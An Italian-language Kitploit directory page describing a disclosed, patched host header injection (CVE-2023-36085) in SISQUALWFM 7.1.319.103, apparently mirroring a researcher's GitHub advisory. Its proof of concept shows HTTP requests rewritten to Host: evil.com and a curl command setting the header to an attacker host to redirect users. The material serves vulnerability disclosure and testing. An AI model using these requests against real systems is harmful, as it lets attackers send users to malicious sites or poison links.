Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-36085_SISQUALWFM-Host-Header-Injection — Questo repository contiene informazioni relative a CVE-2023-36085, una vulnerabilità di host header injection scoperta in SISQUALWFM versione 7.1.319.103, che consente a un aggressore di manipolare i collegamenti delle pagine web o reindirizzare gli utenti verso un sito dannoso. A questa vulnerabilità è stato assegnato il codice CVE-2023-36085 ed è stata corretta nella versione 7.1.319.111 e successive. | Kitploit
Strumenti/GitHubGitHub/omershaik0/cve-2023-36085_sisqualwfm-host-header-injection
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration Testing
GitHubomershaik0/cve-2023-36085_sisqualwfm-host-header-injection

CVE-2023-36085_SISQUALWFM-Host-Header-Injection

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Questo repository contiene informazioni relative a CVE-2023-36085, una vulnerabilità di host header injection scoperta in SISQUALWFM versione 7.1.319.103, che consente a un aggressore di manipolare i collegamenti delle pagine web o reindirizzare gli utenti verso un sito dannoso. A questa vulnerabilità è stato assegnato il codice CVE-2023-36085 ed è stata corretta nella versione 7.1.319.111 e successive.

Condividi

CVE-2023-36085 Vulnerabilità di Host Header Injection in SISQUALWFM

Questo repository contiene informazioni relative a una vulnerabilità di host header injection scoperta in SISQUALWFM versione 7.1.319.103, che consente a un attaccante di manipolare i collegamenti delle pagine web o reindirizzare gli utenti a un sito dannoso. A questa vulnerabilità è stato assegnato il CVE-2023-36085 ed è stata corretta nella versione 7.1.319.111 e successive.

Dettagli della Vulnerabilità

  • Titolo Exploit: SISQUALWFM 7.1.319.103 Host Header Injection
  • Data di scoperta: 17/03/2023
  • Data di segnalazione: 17/03/2023
  • Data di risoluzione: 13/10/2023
  • Autore dell'exploit: Omer Shaik (unknown_exploit)
  • Homepage del fornitore: SISQUALWFM
  • Versione: 7.1.319.103
  • Testato su: SISQUAL WFM 7.1.319.103
  • Versione Affetta: SISQUALWFM 7.1.319.103
  • Versione Corretta: SISQUALWFM 7.1.319.111
  • CVE: CVE-2023-36085
  • Punteggio CVSS: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  • Categoria: Web Apps

Prova di Concetto

Forniamo uno scenario di prova di concetto che dimostra la vulnerabilità di host header injection, mirando specificamente all'endpoint . Questa vulnerabilità consente a un attaccante di manipolare i collegamenti delle pagine web o reindirizzare gli utenti a un altro sito alterando l'host header.

/sisqualIdentityServer/core

Richiesta Originale

root@kitploit:~
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...

Risposta Originale

root@kitploit:~
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...

Richiesta Intercettata (Modificata per Reindirizzare a evil.com)

root@kitploit:~
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...

Risposta

root@kitploit:~
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...

Esecuzione dell'exploit

Metodo di Attacco

Per sfruttare questa vulnerabilità, un attaccante può utilizzare il seguente comando curl per modificare l'host header:

root@kitploit:~
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv

Disclaimer

Questo repository è solo a scopo informativo e non deve essere utilizzato per attività dannose. La vulnerabilità è stata divulgata in modo responsabile al fornitore e il problema è stato risolto. È fondamentale seguire le linee guida dell'hacking etico e rispettare le pratiche di divulgazione responsabile nell'identificazione e segnalazione delle vulnerabilità.

Scarica lo strumento